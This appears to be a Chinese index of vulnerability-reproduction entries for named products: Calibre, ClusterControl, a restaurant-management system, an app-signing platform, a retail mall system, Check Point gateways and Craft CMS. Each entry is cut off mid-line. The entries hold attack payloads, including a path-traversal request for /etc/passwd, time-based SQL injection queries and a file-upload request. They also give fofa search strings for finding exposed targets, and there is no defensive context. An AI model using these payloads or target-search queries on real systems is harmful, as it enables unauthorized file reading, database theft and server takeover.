C18-1Calibre–RCE 漏洞复现: payload: #! /usr/bin/env python3 # PoC for: CVE-2024-6782 # Description: Unauthenticated remote code execution in 6.9.0 <= cali
C17-1ClusterControl-任意文件读取 漏洞复现: payload: GET /././././//etc/passwd HTTP/1.1 Host: Accept-Encoding: identity User-Agent: python-urllib3/1.26.4
C16-3喰星云-数字化餐饮服务系统-SQL 漏洞复现: payload: GET /logistics/home_warning/php/stock.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6191=6193)+THEN+%27%27+ELSE+(SELEC
C16-2喰星云-数字化餐饮服务系统-SQL 漏洞复现: payload: GET /logistics/home_warning/php/not_finish.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6192=6193)+THEN+''+ELSE+(SELE
C16-1喰星云-数字化餐饮服务系统-SQL 漏洞复现: payload: GET /logistics/home_warning/php/not_out_depot.php?do=getList&lsid= HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Maci
C15-2超级猫-签名APP分发平台-任意文件读取 漏洞描述: 超级猫超级签名分发平台是一个安卓苹果APP分发平台,能够对所有安卓苹果的APP进行签名分发,使所有自行开发的APP能够签名使用,包括登录注册等功能,还提供有SDK fofa语法: “/themes/97013266/public/sta
C15-1超级猫-签名APP分发平台-SQL 漏洞描述: 超级猫超级签名分发平台是一个安卓苹果APP分发平台,能够对所有安卓苹果的APP进行签名分发,使所有自行开发的APP能够签名使用,包括登录注册等功能,还提供有SDK 网站图片: fofa语法: “/themes/97013266/public/
C14-1创客13星-零售商城系统-任意文件上传 fofa语法: “/Public/Xin/static/css/iconfont.css” 漏洞复现: payload: POST /Login/shangchuan HTTP/1.1 Accept: text/html,application/xh
C12-1CheckPoint-安全网关-任意文件读取 漏洞描述: Check Point Security Gateways 任意文件读取漏洞(CVE-2024-24919)存在在野利用,远程攻击者可以通过构造恶意请求读取服务器上的任意文件,造成敏感信息的泄漏。目前,此漏洞已检测到在野利用。鉴于该
C11-1CraftCMS-开源的内容管理系统-RCE 漏洞描述: Craft CMS在4.4.15版本之前存在远程代码执行漏洞,攻击者可构造恶意请求执行任意代码,控制服务器。 影响版本: 4.0.0-RC1 <= Craft CMS <= 4.4.14 网站图片: fofa语法: title==“